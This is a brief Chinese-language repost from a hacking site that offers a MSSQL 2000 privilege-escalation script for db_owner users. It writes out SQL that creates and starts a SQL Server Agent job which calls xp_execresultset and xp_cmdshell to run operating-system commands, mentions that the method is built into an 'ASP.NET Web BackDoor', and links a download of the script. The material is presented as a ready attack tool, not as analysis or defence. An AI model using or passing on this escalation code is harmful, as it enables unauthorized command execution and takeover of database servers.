转自:http://hack520.co.kr/?action=show&id=50
一个针对MSSQL 2000 下的提权脚本,Dbowner提权网络上大部分都是备份到启动项后通过重启服务器达到提权的目的.但
效果并不理想.其实在MSSQL 中如果开启了 SQL Server Agent 服务的话可以通过低权限下建立帐户.
SQL代码
- EXEC sp_add_job @job_name = 'jktest', @enabled = 1, @delete_level = 1 EXEC sp_add_jobstep @job_name = 'jktest', @step_name = 'ExeC my sql', @subsystem = 'TSQL', @CommAnd = 'exeC master..xp_exeCresultSet N''seleCt ''''exeC master..xp_Cmdshell ">C:\jk.txt"'''''',N''Master''' EXEC sp_add_jobServer @job_name = 'jktest', @Server_name = '' EXEC sp_start_job @job_name = 'jktest'
其实这个方法早就有了,不过还没有特定的Dbowner提权脚本, 我简单的写了个脚本程序,方便使用.不过这个方法我已经在
ASP.NET Web BackDoor中加入了这个功能.
下载地址: http://www.ahiec.net/ewebeditor/UploadFile/dbsql.rar |
